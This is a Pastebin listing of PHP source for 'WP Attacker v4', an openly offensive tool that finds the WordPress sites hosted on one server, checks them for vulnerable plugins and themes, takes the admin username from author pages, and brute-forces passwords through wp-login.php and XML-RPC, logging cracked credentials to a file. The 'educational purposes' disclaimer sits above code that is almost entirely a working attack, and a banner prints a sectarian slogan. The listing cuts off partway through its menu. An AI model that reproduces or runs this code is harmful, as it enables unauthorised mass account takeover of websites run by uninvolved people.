Googleinurl

[TOOL] WP Attacker v4 © Group XP 2014

May 4th, 2015
2,225
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.    
  4.    
  5.               ██████╗ ██████╗  ██████╗ ██╗   ██╗██████╗     ██╗  ██╗██████╗
  6.              ██╔════╝ ██╔══██╗██╔═══██╗██║   ██║██╔══██╗    ╚██╗██╔╝██╔══██╗
  7.              ██║  ███╗██████╔╝██║   ██║██║   ██║██████╔╝     ╚███╔╝ ██████╔╝
  8.              ██║   ██║██╔══██╗██║   ██║██║   ██║██╔═══╝      ██╔██╗ ██╔═══╝
  9.              ╚██████╔╝██║  ██║╚██████╔╝╚██████╔╝██║         ██╔╝ ██╗██║    
  10.               ╚═════╝ ╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝         ╚═╝  ╚═╝╚═╝ ALM3REFH.COM
  11.    
  12.    
  13.     ██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗
  14.     ██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
  15.     ██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝
  16.     ██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗
  17.     ╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║
  18.      ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ FORTH VERSION
  19.    
  20.     WP Attacker v4 © Group XP 2014
  21.    
  22.     Coder : Hannibal Ksa (@r00t3rz)
  23.     Home  : alm3refh.com, sec4ever.com
  24.    
  25.    
  26.     What's WP Attacker:
  27.     - Scan the server's websites, and filter the ones that are using WorePress (Using Bing search engin [API]).
  28.     - Get All the possible plugins and themese, which are vulnerable (Using a list). *UPDATED*
  29.     - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
  30.     - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
  31.     - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
  32.     - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*
  33.    
  34.     Why WP Attacker?
  35.     - Using Bing API, Which leads to faster & guaranteed responde.
  36.     - User can use his own 0day exploits.
  37.     - BruteForce with two methods/ways.
  38.     - List can be updated by the user.
  39.     - Fast, simple and easy.
  40.    
  41.     # In a simple word, it is an "Automatic WP Exploiter".
  42.    
  43.     Disclaimer:
  44.     - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
  45.     - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
  46.     - USE IT UNDER YOUR OWN RISK!
  47.     - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
  48.    
  49.     Thanks and enjoy.
  50.    
  51.     And stay tuned!
  52.     Best regards, Ali (aka Hannibal Ksa).
  53.    
  54. */
  55. error_reporting(0);
  56. function clear(){
  57.     ##########################
  58.    ##   CLEAN THE SCREEN   ##
  59.    ####################################################
  60.    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
  61.    ####################################################
  62.    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
  63.        @system('cls'); # Windows
  64.    } else { # DIRECTORY_SEPARATOR == '\\'
  65.        @system('clear'); # Linux/UNIX/OS X
  66.    }
  67. }
  68. function banner(){
  69.     ##########################################################
  70.    ##    BANNERS/COPYRIGHTS  R00T3RZ.COM & ALM3REFH.COM    ##
  71.    ##   REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"   ##
  72.    ##########################################################
  73.    ####################
  74.    ##  FIRST BANNER  ##
  75.    ####################
  76.    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
  77.     $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
  78.     $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
  79.     $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
  80.     $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
  81.     #####################
  82.    ##  SECOND BANNER  ##
  83.    #####################
  84.    $bannertwo = "\n\t           (                                              ";
  85.     $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
  86.     $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
  87.     $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
  88.     $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
  89.     $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
  90.     $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
  91.     $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
  92.     $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
  93.     ####################
  94.    ##  THIRD BANNER  ##
  95.    ####################
  96.    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
  97.     $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
  98.     $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
  99.     $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
  100.     $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
  101.     #####################
  102.    ##  FOURTH BANNER  ##
  103.    #####################
  104.    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
  105.     $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
  106.     $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
  107.     $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
  108.     $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
  109.     $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_|\___|_|\_\___|_|   \n";
  110.     $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
  111.     ####################
  112.    ##  FIFTH BANNER  ##
  113.    ####################
  114.    $bannerfiv = "\n\t██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ";
  115.     $bannerfiv .="\n\t██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗";
  116.     $bannerfiv .="\n\t██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝";
  117.     $bannerfiv .="\n\t██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗";
  118.     $bannerfiv .="\n\t╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║";
  119.     $bannerfiv .="\n\t ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝\n\n";
  120.     $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
  121.     #########################################
  122.    ##   GET A RANDOME BANNER & PRINT IT   ##
  123.    ##         METASPLOIT SWAG :-P         ##
  124.    #########################################
  125.    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
  126.     print $banner[array_rand($banner)];
  127. }
  128. function noblackhat(){
  129.     ##################
  130.    ##  DISCLAIMER  ##
  131.    ##################
  132.    print "\n\t ______________________________________________";
  133.     print "\n\t|    ____                        __  ______    |";
  134.     print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
  135.     print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
  136.     print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
  137.     print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
  138.     print "\n\t|                        |_|ALM3REFH.com       |";
  139.     print "\n\t|                                              |";
  140.     print "\n\t+----------------------------------------------+";
  141.     print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
  142.     print "\n\t+----------------------------------------------+\n\n";
  143.     print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
  144.     ###########################
  145.    ##  5 SECONDS DISCLAIMER ##
  146.    ###########################
  147.    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
  148. \tresponsibility for any actions performed using this tool.            
  149. \tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!                            
  150. \tIf these terms are not acceptable to you, then do not use this tool.
  151. \n\tPlease Read! Continuing in 5 seconds ";
  152.     sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
  153.     print "\n\n\n\n";
  154. }
  155. function bing_it($hk){
  156.     ##################
  157.    ##   BING API   ##
  158.    ###########################################################################
  159.    ##   REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]   ##
  160.    ##  MORE INFO [ https://datamarket.azure.com/dataset/bing/search ]       ##
  161.    ###########################################################################
  162.    $account_key = 'ACCOUNT_KEY_GOES_HERE';
  163.     $query = $hk;
  164.     $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
  165.     $ch = curl_init();
  166.     curl_setopt($ch, CURLOPT_URL, $url);
  167.     curl_setopt($ch, CURLOPT_HEADER, false);
  168.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  169.     curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
  170.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  171.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  172.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  173.     curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
  174.     $json = curl_exec($ch);
  175.     curl_close($ch);
  176.     $data = json_decode($json);
  177.     foreach ($data->d->results as $value) {
  178.         $file = fopen("sites.txt","a+");
  179.         fwrite($file,"{$value->DisplayUrl}\n");
  180.         fclose($file);
  181.     }
  182. }
  183. function wp($list){
  184.     ########################################
  185.    ##   CHECK IF IS BUILT ON WORDPRESS   ##
  186.    ########################################
  187.    $file = file_get_contents($list);
  188.     $get = explode('\n', $file);
  189.     foreach($get as $site){
  190.         $ch = curl_init();
  191.         curl_setopt($ch, CURLOPT_URL, $site);
  192.         curl_setopt($ch, CURLOPT_HEADER, 0);
  193.         curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  194.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  195.         $result = curl_exec($ch);
  196.         curl_exec($ch);
  197.         curl_close($ch);
  198.         if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
  199.             $filename = 'wp-sites.txt';
  200.             $fp = fopen($filename, "a+");
  201.             $write = fputs($fp, $site."\n");
  202.             fclose($fp);
  203.         }
  204.     }
  205.     $lines = file('wp-sites.txt');
  206.     $lines = array_unique($lines);
  207.     file_put_contents('wp-sites.txt', implode($lines));
  208. }
  209. function wp_em($list){
  210.     ###############################
  211.    ##   MAKE'EM CRYSTAL CLEAR   ##
  212.    ###############################
  213.    $file = file_get_contents($list);
  214.     $get = explode("\n", $file);
  215.     foreach($get as $wpsite){
  216.         $ch = curl_init();
  217.         curl_setopt($ch, CURLOPT_URL, $wpsite);
  218.         curl_setopt($ch, CURLOPT_HEADER, 0);
  219.         curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  220.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  221.         $result = curl_exec($ch);
  222.         curl_exec($ch);
  223.         curl_close($ch);
  224.         preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
  225.         $wpurl = str_replace("xmlrpc.php","",$url[1]);
  226.         $filename = 'wp.txt';
  227.         $fp = fopen($filename, "a+");
  228.         $write = fputs($fp, $wpurl."\n");
  229.         fclose($fp);
  230.     }
  231.     $lines = file('wp.txt');
  232.     $lines = array_unique($lines);
  233.     file_put_contents('wp.txt', implode($lines));
  234. }
  235. function xp_scanner($target, $list, $key = NULL){
  236.     ##########################################################
  237.    ##   PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION  ##
  238.    ##########################################################
  239.    ##  LIST FORMAT:  NAME:PATH:KEYWORD                     ##
  240.    ##  EXAMPLE:  xp:wp-content/plugins/xp/xp.php:Group-XP  ##
  241.    ##########################################################
  242.    ##  NAME IS REQUIRED (*)                                ##
  243.    ##  PATH IS REQUIRED (*)                                ##
  244.    ##  KEYWORD IS OPTIONAL (?)                             ##
  245.    ##########################################################
  246.    $file = file_get_contents($list);
  247.     $plugins = explode("\n", $file);
  248.     #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
  249.    if($key == NULL){
  250.         foreach($plugins as $plugin){
  251.             #####################
  252.            ##   GET HEADERS   ##
  253.            #####################
  254.            $x = explode(":", $plugin);
  255.             $target = $target.'/'.$x[1];
  256.             $check = @get_headers($target);
  257.             if(eregi("200",$check[0])){
  258.                 ####################
  259.                ##  PLUGIN FOUND  ##
  260.                ####################
  261.                print "\n\t[!] FOUND $x[0] -> $target";
  262.                 /*
  263.                 #############
  264.                 ## SAVE IT ##
  265.                 #############
  266.                 $data = $target." -> ".$x[0]."\n";
  267.                 $filename = 'vuln.txt';
  268.                 $fp = fopen($filename, "a+");
  269.                 $write = fputs($fp, $data);
  270.                 fclose($fp);
  271.                 */
  272.             }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
  273.        }
  274.     }else{
  275.         foreach($plugins as $plugin){
  276.             #####################
  277.            ##   GET KEYWORD   ##
  278.            #####################
  279.            $x = explode(":", $plugin);
  280.             $ch = curl_init();
  281.             curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
  282.             curl_setopt($ch, CURLOPT_HEADER, 0);
  283.             curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  284.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  285.             $result = curl_exec($ch);
  286.             curl_exec($ch);
  287.             curl_close($ch);
  288.             if(preg_match("#".$x[2]."#", $result)){
  289.                 ####################
  290.                ##  PLUGIN FOUND  ##
  291.                ####################
  292.                print "\n\t[!] FOUND $x[0] -> $target";
  293.                 /*
  294.                 #############
  295.                 ## SAVE IT ##
  296.                 #############
  297.                 $data = $target." -> ".$x[0]."\n";
  298.                 $filename = 'vuln.txt';
  299.                 $fp = fopen($filename, "a+");
  300.                 $write = fputs($fp, $data);
  301.                 fclose($fp);
  302.                 */
  303.             } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
  304.        }
  305.     }
  306. }
  307. function xp_get_plugins($target){
  308.     #########################
  309.    ##   GET ALL PLUGINS   ##
  310.    #########################
  311.    $ch = curl_init();
  312.     curl_setopt($ch, CURLOPT_URL, $target);
  313.     curl_setopt($ch, CURLOPT_HEADER, 0);
  314.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  315.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  316.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  317.     $result = curl_exec($ch);
  318.     curl_exec($ch);
  319.     curl_close($ch);
  320.     preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
  321.     $plugins = array_unique($plugin[1]);
  322.     #if(count($plugins)==0){
  323.    #    print "No Plugin was found.";
  324.    #}
  325.    foreach($plugins as $found){
  326.         #print "\n\n$found\n\n";
  327.        #################
  328.        ##  SEARCH IT  ##
  329.        #################
  330.        xp_scanner_db($target, $found);
  331.     }
  332. }
  333. function xp_get_themes($target){
  334.     #########################
  335.    ##   GET ALL PLUGINS   ##
  336.    #########################
  337.    $ch = curl_init();
  338.     curl_setopt($ch, CURLOPT_URL, $target);
  339.     curl_setopt($ch, CURLOPT_HEADER, 0);
  340.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  341.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  342.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  343.     $result = curl_exec($ch);
  344.     curl_exec($ch);
  345.     curl_close($ch);
  346.     preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
  347.     $themes = array_unique($theme[1]);
  348.     #if(count($plugins)==0){
  349.    #    print "No Plugin was found.";
  350.    #}
  351.    foreach($themes as $found){
  352.         #print "\n\n$found\n\n";
  353.        #################
  354.        ##  SEARCH IT  ##
  355.        #################
  356.        xp_scanner_db($target, $found);
  357.     }
  358. }
  359. function xp_scanner_db($target, $plugin){
  360.     #######################################################################
  361.    ##   PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION  ##
  362.    #######################################################################
  363.    ##  THIS VERSION ONLY CHECKS  ##
  364.    ## - WORDPRESSEXPLOIT.COM     ##
  365.    ## - EXPLOIT-DB.COM           ##
  366.    ################################
  367.    $wpexploit = array("http://www.wordpressexploit.com/", );
  368.     $ch = curl_init();
  369.     curl_setopt($ch, CURLOPT_URL, $wpexploit);
  370.     curl_setopt($ch, CURLOPT_HEADER, 0);
  371.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  372.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  373.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  374.     $result = curl_exec($ch);
  375.     curl_exec($ch);
  376.     curl_close($ch);
  377.     if(preg_match("#$plugin#", $result)){
  378.         ##############
  379.        ##  GOTCHA  ##
  380.        ##############
  381.        //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
  382.         ###############
  383.        ##  SAVE IT  ##
  384.        ###############
  385.        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
  386.         $filename = 'vulpl.txt';
  387.         $fp = fopen($filename, "a+");
  388.         $write = fputs($fp, $data."\n");
  389.         fclose($fp);
  390.     }
  391. }
  392. function xp_get_user($target,$list, $xmlrpc = NULL){
  393.     ####################################
  394.    ##     GET WORDPRESS USERNAME     ##
  395.    ##  A SIMPLE ONE BUT WOTH A SHOT  ##
  396.    ####################################
  397.    $user = trim(($target))."/?author=1";
  398.     $ch = curl_init();
  399.     curl_setopt($ch, CURLOPT_URL, $user);
  400.     curl_setopt($ch, CURLOPT_HEADER, 0);
  401.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  402.     curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  403.     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  404.     $result = curl_exec($ch);
  405.     curl_exec($ch);
  406.     curl_close($ch);
  407.     preg_match('#<title>(.*?)</title>#', $result, $username);
  408.     $account = explode('|', $username[1]);
  409.     if($xmlrpc == NULL){
  410.         ###########################################################
  411.        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
  412.        ###########################################################
  413.        return xp_brute($target,$account[0],$list);
  414.     }else {
  415.         ###########################################################
  416.        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
  417.        ###########################################################
  418.        return xp_brute_xmlrpc($target,$account[0],$list);
  419.     }
  420. }
  421. function xp_brute($target,$user,$list){
  422.     ###########################################
  423.    ##   BRUTE FORCE PULBLIC/FIRST VERSION   ##
  424.    ###########################################
  425.    ##  PASSWORDS LIST FORMAT:  PASSWORD\n   ##
  426.    ##  EXAMPLE:  12345\np4ssw0rd            ##
  427.    ##  ( \n = NEW LINE )                    ##
  428.    ###########################################
  429.    $file = file_get_contents($list);
  430.     $passwords = explode("\n", $file);
  431.     $target = trim($target);
  432.     $user = trim($user);
  433.     print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
  434.     foreach($passwords as $password){
  435.         #############################
  436.        ##  TESTING EACH PASSWORD  ##
  437.        #############################
  438.        $redirect = $taregt."/wp-admin/";
  439.         $curl = curl_init();
  440.         curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
  441.         curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  442.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  443.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  444.         curl_setopt($curl,CURLOPT_TIMEOUT,10);
  445.         curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  446.         curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  447.         curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  448.         $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
  449.         curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
  450.         $result = curl_exec($curl);
  451.         curl_close($curl);
  452.         ##########################
  453.        ##  CHECK IF IT WORKED  ##
  454.        ##########################
  455.        if(strstr($result, 'tab-panel-overview')){
  456.             print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
  457.             ###############
  458.            ##  SAVE IT  ##
  459.            ###############
  460.            $data = "\n[!] Cracked $target -> [ $user:$password ]";
  461.             $filename = 'cracked.txt';
  462.             $fp = fopen($filename, "a+");
  463.             $write = fputs($fp, $data."\n");
  464.             fclose($fp);
  465.             break;
  466.         }#else{ print "\n[+] Trying $user:$password"; }
  467.    }
  468. }
  469. function xp_check_xmlrpc($target){
  470.     $target = $target."/xmlrpc.php";
  471.     $check = @get_headers($target);
  472.     if(eregi("200",$check[0])){
  473.         return 1;
  474.     }else{
  475.         return 0;
  476.     }
  477. }
  478. function xp_brute_xmlrpc($target,$user,$list){
  479.     ######################################################
  480.    ##   BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION   ##
  481.    ######################################################
  482.    ##  PASSWORDS LIST FORMAT:  PASSWORD\n              ##
  483.    ##  EXAMPLE:  12345\np4ssw0rd                       ##
  484.    ##  ( \n = NEW LINE )                               ##
  485.    ######################################################
  486.    $target = trim($target);
  487.     $user = trim($user);
  488.     if(xp_check_xmlrpc($target) != 1){
  489.         print "\n[!] Couldn't find xmlrpc.php in $target\n";
  490.         break;
  491.     }else{
  492.         $file = file_get_contents($list);
  493.         $passwords = explode("\n", $file);
  494.         print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
  495.         foreach($passwords as $password){
  496.             $password = trim($password);
  497.             $headers = array('Content-Type: application/x-www-form-urlencoded');
  498.             $isadmin = '<name>isAdmin</name>';
  499.             #############################
  500.            ##  TESTING EACH PASSWORD  ##
  501.            #############################
  502.            $data = "
  503.            <methodCall>
  504.                <methodName>wp.getUsersBlogs</methodName>
  505.                <params>
  506.                <param><value><string>$user</string></value></param>
  507.                <param><value><string>$password</string></value></param>
  508.            </params></methodCall>
  509.            ";
  510.             $curl = curl_init();
  511.             curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
  512.             curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  513.             curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
  514.             curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  515.             curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  516.             curl_setopt($curl,CURLOPT_TIMEOUT,10);
  517.             curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  518.             curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  519.             curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  520.             curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
  521.             $result = curl_exec($curl);
  522.             curl_close($curl);
  523.             ##########################
  524.            ##  CHECK IF IT WORKED  ##
  525.            ##########################
  526.            if(strstr($result, $isadmin)){
  527.                 print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
  528.                 ###############
  529.                ##  SAVE IT  ##
  530.                ###############
  531.                $data = "\n[!] Cracked $target -> [ $user:$password ]";
  532.                 $filename = 'cracked.txt';
  533.                 $fp = fopen($filename, "a+");
  534.                 $write = fputs($fp, $data."\n");
  535.                 fclose($fp);
  536.                 break;
  537.             }#else{ print "\n[+] Trying $user:$password"; }
  538.        }
  539.     }
  540. }
  541. function bye(){
  542.     ########################
  543.    ##  DONE/SAY GOODBYE  ##
  544.    ########################
  545.    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
  546.     ######################
  547.    ## DELETE LOG FILES ##
  548.    ###################################################################
  549.    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
  550.    ###################################################################
  551.    unlink('sites.txt');
  552.     unlink('wp-sites.txt');
  553.     unlink('wp.txt');
  554.     unlink('vuln.txt');
  555.     unlink('cracked.txt');
  556.     exit(2);
  557. }
  558. ############################
  559. ##  COMMAND LINE'S  SHIT  ##
  560. ############################
  561. clear();
  562. noblackhat();
  563. ################################################
  564. ##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
  565. ################################################
  566. if( strtolower(php_sapi_name()) != 'cli' ) {
  567.     printf("%s\n", "Please run only from command line interface.");
  568.     exit;
  569. }
  570. clear();
  571. banner();
  572. print "\nIP-Address # ";
  573. $target = trim(fgets(STDIN));
  574. // if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
  575. ##############################
  576. ##   DELETE OLD LOG FILES   ##
  577. ##############################
  578. unlink('sites.txt');
  579. unlink('wp-sites.txt');
  580. unlink('wp.txt');
  581. unlink('vuln.txt');
  582. unlink('cracked.txt');
  583. unlink('vulpl.txt');
  584. #############################
  585. ##   CREAT THE LOG FILES   ##
  586. #############################
  587. $log1 = fopen("sites.txt","w");fclose($log1);
  588. $log2 = fopen("wp-sites.txt","w");fclose($log2);
  589. $log3 = fopen("wp.txt","w");fclose($log3);
  590. $log4 = fopen("vuln.txt","w");fclose($log4);
  591. $log4 = fopen("cracked.txt","w");fclose($log4);
  592. $log5 = fopen("vulpl.txt","w");fclose($log5);
  593. ###############################
  594. ##  SHIT IS GETTIN' REAL =P  ##
  595. ###############################
  596. print "\nDORK [or simply leave it empty] # ";
  597. $dork = trim(fgets(STDIN));
  598. print "\n[+] Getting the server's sites";
  599. if($dork == ""){
  600.     #########################
  601.    ##  IF DORK WAS EMPTY  ##
  602.    #########################
  603.    bing_it("ip:$target");
  604.     bing_it("ip:".$target." /page_id=");
  605.     bing_it("ip:".$target." Wordpress");
  606.     bing_it("ip:".$target." blog");
  607. }else{
  608.     ###########################
  609.    ##  USE THE USER'S DORK  ##
  610.    ###########################
  611.    bing_it("ip:".$target." ".$dork);
  612. }
  613. #print "\n[-] Got'em";sleep(1);
  614. print "\n[+] Separating the sites";
  615. wp('sites.txt');
  616. #print "\n[-] We got the sites, which are using WordPress";sleep(1);
  617. wp_em('wp-sites.txt');
  618. #################
  619. ##   Results   ##
  620. #################
  621. print "\n[+] Finished, these are the website/s that I found:\n";
  622. $wplist = file_get_contents('wp.txt');
  623. $get = explode("\n", $wplist);
  624. #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
  625. foreach($get as $hk){
  626.     if(!$hk==""){
  627.         print "\n\t[!] $hk";
  628.     }
  629. }
  630. ###########################
  631. ##   GIVE ME AN OPTION   ##
  632. ###########################
  633. print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
  634. print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
  635. $what = trim(fgets(STDIN));
  636. $choice = array("1","2","3","4");
  637. $yesno = array("y","yes");
  638. if(in_array($what, $choice)){
  639.     if($what == "1"){
  640.         print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
  641.         $list = trim(fgets(STDIN));
  642.         if(!is_file($list)) {
  643.             #######################
